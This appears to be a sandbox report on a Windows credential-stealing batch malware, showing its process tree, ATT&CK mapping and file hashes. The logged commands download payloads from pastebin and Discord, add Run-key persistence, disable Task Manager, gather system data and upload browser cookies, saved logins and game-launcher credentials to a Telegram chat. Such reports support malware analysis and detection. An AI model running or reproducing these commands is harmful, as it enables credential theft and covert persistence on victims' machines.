  xcopy /y C:\Users\Admin\Downloads\RestoreResume.css
  2⤵
  PID:1076
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\ShowRestart.html
  2⤵
  PID:4968
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\StartExpand.AAC
  2⤵
  PID:4000
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\SubmitBackup.odt
  2⤵
  PID:2188
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\SubmitCompress.vst
  2⤵
  PID:2672
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\SwitchResize.sys
  2⤵
  PID:3936
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\TraceExit.WTV
  2⤵
  PID:3928
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\TraceTest.wma
  2⤵
  PID:1340
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\UnlockConfirm.wps
  2⤵
  PID:4892
- C:\Windows\system32\xcopy.exe
  xcopy /y C:\Users\Admin\Downloads\UnlockSend.snd
  2⤵
  PID:4404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://pastebin.com/raw/CSGTwG5A -outfile ReadMe.html"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\ReadMe.html
  2⤵
  - Adds Run key to start application
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2768
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0xfc,0x100,0x40,0x104,0x7ffdd12246f8,0x7ffdd1224708,0x7ffdd1224718
    3⤵
    PID:3532
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
    3⤵
    PID:4184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
    3⤵
    PID:5136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
    3⤵
    PID:5360
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
    3⤵
    PID:5376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4904 /prefetch:8
    3⤵
    PID:5580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5548 /prefetch:8
    3⤵
    PID:5928
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
    3⤵
    PID:5980
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
    3⤵
    PID:5992
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3564 /prefetch:8
    3⤵
    PID:5184
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
    3⤵
    - Drops file in Program Files directory
    PID:5132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff75ebb5460,0x7ff75ebb5470,0x7ff75ebb5480
      4⤵
      PID:5344
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3564 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5928 /prefetch:8
    3⤵
    PID:5904
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5076 /prefetch:8
    3⤵
    PID:6280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2176,9368938373369071213,13130655909861777357,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1884 /prefetch:8
    3⤵
    PID:6332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://pastebin.com/raw/DBB1z422 -outfile keklog.cmd"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf D:\
  2⤵
  PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K keklog.cmd
  2⤵
  - NTFS ADS
  PID:4812
- - C:\Windows\system32\attrib.exe
    attrib +h +s keklog.cmd
    3⤵
    - Views/modifies file attributes
    PID:4144
- - C:\Windows\system32\reg.exe
    reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_30333_toolbar" /t "REG_SZ" /d keklog.cmd /f
    3⤵
    - Adds Run key to start application
    PID:1564
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:2708
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
    3⤵
    PID:944
- - C:\Windows\system32\curl.exe
    curl -s -o IP.txt https://ipv4.wtfismyip.com/text
    3⤵
    PID:2812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\apps.txt"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5192
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@C:\Users\Admin\apps.txt
    3⤵
    PID:5496
- - C:\Windows\system32\ipconfig.exe
    ipconfig
    3⤵
    - Gathers network information
    PID:5516
- - C:\Windows\system32\getmac.exe
    getmac
    3⤵
    PID:5532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic partition get name,size,type
    3⤵
    PID:5808
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:5872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path softwareLicensingService get OA3xOriginalProductKey
    3⤵
    PID:5976
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@C:\Users\Admin\userdata.txt
    3⤵
    PID:5448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    PID:3296
- - C:\Users\Admin\GetToken.exe
    GetToken.exe
    3⤵
    - Executes dropped EXE
    PID:5744
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 3
    3⤵
    - Runs ping.exe
    PID:5880
- - C:\Users\Admin\GetToken.exe
    GetToken.exe
    3⤵
    - Executes dropped EXE
    PID:5960
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 3
    3⤵
    - Runs ping.exe
    PID:2104
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"Tokens.txt"
    3⤵
    PID:5204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "Compress-Archive C:\Users\Admin\AppData\Roaming\.minecraft\mods C:\Users\Admin\AppData\Roaming\modss.zip -CompressionLevel "Fastest""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5764
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\AppData\Roaming\mods.zisp"
    3⤵
    PID:6272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "Compress-Archive C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies C:\Users\Admin\ChromeCookies.zip -CompressionLevel "Fastest""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6288
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\ChromeCookies.zip"
    3⤵
    PID:6380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "Compress-Archive C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History C:\Users\Admin\ChromeHistory.zip -CompressionLevel "Fastest""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6396
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\ChromeHistory.zip "
    3⤵
    PID:6492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "Compress-Archive C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts C:\Users\Admin\ChromeShortcuts.zip -CompressionLevel "Fastest""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6508
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\ChromeShortcuts.zip"
    3⤵
    PID:6596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "Compress-Archive C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks C:\Users\Admin\ChromeBookmarks.zip -CompressionLevel "Fastest""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6616
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\ChromeBookmarks.zip"
    3⤵
    PID:6704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "Compress-Archive C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data C:\Users\Admin\ChromeLoginData.zip -CompressionLevel "Fastest""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6720
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\ChromeLoginData.zip"
    3⤵
    PID:6808
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials.bin"
    3⤵
    PID:6824
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials_microsoft_store.bin"
    3⤵
    PID:6840
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json"
    3⤵
    PID:6856
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts_microsoft_store.json"
    3⤵
    PID:6872
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_product_state.json"
    3⤵
    PID:6888
- - C:\Windows\system32\curl.exe
    curl -v -F "chat_id=-655682538" -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json"
    3⤵
    PID:6904
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf E:\
  2⤵
  PID:4404
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf F:\
  2⤵
  PID:3472
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf G:\
  2⤵
  PID:2360
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf H:\
  2⤵
  PID:4668
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\kekpop.cmd D:\
  2⤵
  PID:4184
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\kekpop.cmd E:\
  2⤵
  PID:1372
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\kekpop.cmd F:\
  2⤵
  PID:1528
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\kekpop.cmd H:\
  2⤵
  PID:636
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\kekpop.cmd C:\Users\Admin
  2⤵
  PID:768
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\kekpop.cmd G:\
  2⤵
  PID:2064
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\kekpop.cmd C:\Windows\system32
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:4144
- C:\Windows\system32\net.exe
  net send * "Look out, kekpop is on your network"
  2⤵
  PID:5328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 send * "Look out, kekpop is on your network"
    3⤵
    PID:5344

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:5292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd12246f8,0x7ffdd1224708,0x7ffdd1224718
  2⤵
  PID:6480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,14443209185270518648,10302553456177058876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,14443209185270518648,10302553456177058876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,14443209185270518648,10302553456177058876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:8
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,14443209185270518648,10302553456177058876,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3888 /prefetch:8
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,14443209185270518648,10302553456177058876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,14443209185270518648,10302553456177058876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
  2⤵
  PID:5652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,14443209185270518648,10302553456177058876,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5420 /prefetch:8
  2⤵
  PID:7112

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d136d3411d4aa688242c53cafb993aa6

SHA1
1a81cc78e3ca445d5a5193e49ddce26d5e25179f

SHA256
00ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397

SHA512
282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GetToken.exe.log

Filesize
226B

MD5
916851e072fbabc4796d8916c5131092

SHA1
d48a602229a690c512d5fdaf4c8d77547a88e7a2

SHA256
7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

SHA512
07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2022.3.1\manifest.fingerprint

Filesize
66B

MD5
39dd71bf35668180c97c9a8b8bd555de

SHA1
fb84b9b2f45fa2671e3cc836b8fb6ae3667687e2

SHA256
200c559a1085652de1345825c4bf42aef64414ef54c6b88e3dce0c9646920452

SHA512
f0e4c029cd1ffb9309301253899b565ef1dd2d4b64cafb41f2420ce5c8848088a0c4c60e33f3031f35701de73925390761960a87fbbcaacf5182942fdbf0e50f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2022.3.1\manifest.json

Filesize
113B

MD5
fd699fc11025d72a4a773e816c97710d

SHA1
c63480f2a6959fc0070322ee944f2aab051a994d

SHA256
ec0bb7852062971fca00a508d71b7eec95124e36894ed7e69b7e81e652f76516

SHA512
04b9c5048c21407aafd203585d23e660edbe0beac17a3111ca0799ca53229a964bcaed9a18c4ca066c95824388422d4eadcb2d1322fbbf758700fc7330dd549f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
53473ab893aa74c050da4b15a702cea9

SHA1
85c34c1138235afa21eae7c142640358ee110a5d

SHA256
0ab2a2ba17aad5490bd5c0e2febf6087af97eff3cf347b615b1542a70909b852

SHA512
3ffad5f15b37bcddd4018adfc0633e7e1573b5de829e217550d805870afdbe13194e1f0ef3026d1d26a50fc2a231966ed5eff465df4f9ea8e8490dc478df7e6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
20KB

MD5
c4c019c98533cf0038cdc6f883e03be6

SHA1
e7096c76212994d4aed2f3f5060b65639b7ff9c6

SHA256
457ed2e7d92fa428468de4f66a850ad5e6bcde64052c33ca6cdbd94ff7365682

SHA512
390149c76f365a3754030ca710599b2d2e886bff12f0d1a33a75420ea4d05efe50bae2df38109ad93cbd4ffd0a47268e1ae0f61fbd97ef003516491421ba9243

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index

Filesize
256KB

MD5
7549c6146fe08df3928e79c6d3df4184

SHA1
576d58e0ff1e93f439d5bffefdb31f82acc6fee8

SHA256
a2633841d557b13a1e35bee07720d43c68ccff5462f3aff696e063bc20133c5e

SHA512
71c7452411a76e52d0aff4efcd93691868ee04544996833a7b2a13b3af500a42b41ef6bae13daca5821eddd04674a3a07bd89e24cc58f9a8a451d2da6176193b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
3f0de2b22650a9c2eee0e717337bae42

SHA1
8151aa37753c980ca2afb7d89e7f9f08ebd56daf

SHA256
7ecdb7c411399f9f61b936e14ae12e9add6345444c56057d7931f580399ab3ba

SHA512
20880c1c33c4db2107a5d86d6730f6ae33ad82bed194772a07587ab2be1ebdd88d42a28c1bd67fc1dc70d650e0143971c1c4cc0336214c7436534deb6aa49d5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
473B

MD5
f9f7ee53c249413c193bac929ece4a1d

SHA1
1f49ff04d2bf2187cff1e40f894c144faaac9363

SHA256
f5a578090b4c6a34d22838d1c4f3024d34b8e7bb115633b544159e0bb98e9103

SHA512
4b9dd7a3516e585a21ddee854200ec5abab2f348802c49ef8b373f1e2e70a24c37a6e77045dfd6817c7e1204ca00f8cfc1e86cc33bf8c4c2bc7db7c246544f80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4bd7f56853da868e91624ae5d7b2ca7c

SHA1
c8d1f511786df121c84fc97a0b9eab48afc501e5

SHA256
8bb6aabda0aef516ff6af88b5d9faf7665031e6c12c6de59bbbb87e30259f1d7

SHA512
